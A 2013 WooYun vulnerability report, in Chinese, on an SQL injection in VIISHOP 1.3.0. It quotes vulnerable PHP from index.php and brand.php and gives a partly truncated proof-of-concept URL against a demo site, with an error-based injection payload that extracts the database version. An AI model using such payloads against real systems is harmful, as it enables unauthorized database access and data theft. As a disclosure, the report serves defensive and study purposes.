当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(2) 关注此漏洞

缺陷编号: WooYun-2013-21365

漏洞标题: VIISHOP 1.3.0 SQL Injection Vulnerability

相关厂商: VIISHOP

漏洞作者: knife

提交时间: 2013-04-08 10:42

公开时间: 2013-05-23 10:43

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 15

漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 第三方不可信程序 Mysql php+字符类型注射 php源码审核 php源码分析 白盒测试 VIISHOP

0人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-04-08: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-05-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

问题挺严重的

详细说明:

/*******************************************************/

/* VIISHOP 1.3.0 SQL Injection Vulnerability

/* ========================

/* By: : Kn1f3

/* E-Mail : 681796@qq.com

/*******************************************************/

/* Welcome to http://www.90sec.com */

/*******************************************************/

//index.php 首页文件

code 区域
//index.php 首页文件
$GLOBALS['_REQUEST'] = isset( $_REQUEST ) ? $_REQUEST : "";
define( "BASEDIR", dirname( __FILE__ ) );
include_once( BASEDIR."/config/db_config.php" );
include_once( BASEDIR."/include/common.inc.php" );
if ( !isset( $_REQUEST['p'] ) )
{
                                $GLOBALS['_REQUEST']['p'] = "index";
}
$inc = str_replace( array( ":", "/", "..", ".", ";", "\\", "http", "ftp" ), "", $_REQUEST['p'] );
$inc = eregi_replace( "[^_a-zA-Z0-9]", "", $inc );
if ( !include( "system/{$inc}.php" ) )  //包含 进行了过滤 查看system目录下文件
{
                                show_msg( "error_once", "index.php" );
}





问题出在brand.php文件中

code 区域
$brand_list = $db->fetch_array( $db->query( "SELECT * FROM {$prefix}brand WHERE uid = '{$brand_id}'" ) );  //$prefix 和 $brand_id 未初始化没有进行任何过滤就带入查询了





poc: http://demo.viishop.com/index.ph ... 28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28select%20version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29

漏洞证明:

1304031410d2545245b56014b7.jpg

修复方案:

:) 推荐80sec 的防注入代码 哈哈哈哈

版权声明:转载请注明来源 knife@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

登录后才能发表评论,请先 登录